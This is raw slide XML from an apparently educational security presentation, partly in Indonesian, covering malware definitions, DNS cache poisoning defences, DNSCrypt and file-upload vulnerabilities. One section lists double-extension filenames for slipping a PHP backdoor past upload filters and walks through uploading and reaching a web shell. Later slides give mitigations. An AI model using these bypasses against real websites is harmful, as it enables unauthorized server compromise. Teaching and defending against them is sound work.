              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> software. Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, script, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lain) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>menganggu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>menolak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hilangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>privasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sumberdaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352514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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other than scaling up security systems, admins should </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>update their firmware and software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to keep the security systems current. Operating systems should be patched with latest updates. There should not be any third party outgoing link. The server should be the only interface between the network and Internet and should be behind a good firewall.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>trust relations of servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the network should be moved up higher so that they do not ask just any server for DNS resolutions.  That way, only the servers with genuine certificates would be able to communicate with the network server while resolving DNS servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>time period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of each entry in DNS cache should be short, so that DNS records are fetched more frequently and are updated. This may mean longer time-periods of connecting to websites (at times), but will reduce the chances of using a poisoned cache.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DNS Cache Locking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> should be configured to 90% or greater on your Windows system. Cache locking in Windows Server allows you to control whether or not information in the DNS cache can be overwritten. See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>TechNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for more on this.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DNS Socket Pool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as it enables a DNS server to use source port randomization when issuing DNS queries. This provides enhanced security against cache poisoning attacks, says </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>TechNet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Domain Name System Security Extensions (DNSSEC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a suite of extensions for Windows Server that add security to the DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>protocol.You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can read more about this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281155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DNSCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Encrypt Data from Computer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>DNSCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, a lightweight program that encrypts the exchange of data between your computer and the DNS Servers. In a way, it is all about your privacy, as men in middle (hackers) won’t be able to understand what is happening on your Windows computer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35362918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a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> know about the VPNs that encrypt your data and exchanges it in a secure tunnel created between your computer and the host. Though VPNs provide a better security and privacy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DNSCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, they often slow down your browsing. Proxies are for accessing sites (by changing your IP address). They don’t provide encryption in most cases. We also discussed about certain DNS (example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) that provide content filtering in addition to a secure (anti-malware) connections. You know that not all websites are not safe. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Comodo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> perform a check when you request a website connection and will inform you if the website is dangerous. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OpenDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> also offers content filtering that can be called Parental Controls over the network. You do not need to configure it on all computers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally, with the above (exception: VPNs), your data is exposed to the “man in the middle” when you send a website request, email or even an IM. To protect this data, you need something that encrypts your data between your computer and the DNS server you are using. The DNS server could be anything of your choice. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DNSCrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a program that provides encryption of this data (between you and the DNS). You can select from the listed service providers or use the Network Adaptor settings to change the DNS manually.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10729129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http://simonclausen.dk/projects/dnscrypt-winservicemgr/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>securityidiots.com/Web-Pentest/XPATH-Injection/Basics-of-XPATH-for-XPATH-Injection-part-1.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39968310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Upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FIle</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4969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However there is a problem, The PHP files can still be uploaded by various methods. The most common method is by renaming the PHP backdoor to the following and then uploading the shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php;.jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php.jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>..jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php.jpg</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php.jpg:;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php.jpg%;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php.jpg;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php.jpg;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shell.php.jpg:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1511276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 1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024128" y="2286000"/>
            <a:ext cx="5003185" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>http live headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>extention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, then go to the upload section. Open Live HTTP Headers and upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some websites) so we will have to change that hidden .php.jpg extension into the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So as we uploaded the shell and opened the Live HTTP Headers you should find where you have uploaded your shell. You will have to find the line where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> writes that you uploaded the shell. Select it and then click on button reply.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="http://1.bp.blogspot.com/-GidmrQgWvoE/TyQhrKwSIXI/AAAAAAAAByE/MyvGizyIJsY/s640/image+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7130" y="2142014"/>
            <a:ext cx="5495925" cy="3638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1303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 2 - </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024129" y="2286000"/>
            <a:ext cx="5556976" cy="4023360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After uploading, find the directory where your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uploaded, example if you uploaded it in images then it will be in http://website/images/shell.php. The rest of the steps are self explanatory.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://4.bp.blogspot.com/-zqih78xNRz4/TyQhl7C0ccI/AAAAAAAABxs/LzlV5F-VL6c/s640/step+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9712" y="1827503"/>
            <a:ext cx="4474098" cy="4109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8355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Protect Your Website from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>FileUpload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Vulnerability?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>third party </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fileuploading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service, Where the file get's uploaded the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fileuploading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service's server not yours</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Always Store Uploaded Files Outside of the Document </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>If your website is example.com and when a visitor accesses this website in their browser, the script located at /home/example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>public_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> is executed, then you should not be storing the files that users have uploaded in /home/example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>public_html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/ or any of its subdirectories. A good candidate, instead, would be /home/example/uploaded/.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="21595"/>
            <a:ext cx="28886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Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="11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35635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a:t>Ineffective Strategies for Securing File Upload Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Blacklisting Bad File Extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() to Verify that the File is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find a local file inclusion vulnerability elsewhere in the target application which isn't already immediately useful for compromising the entire system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Upload a file outside of the web-root that contains malicious shell code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the local file inclusion to get the file to execute.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two schools of thought for how to handle this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
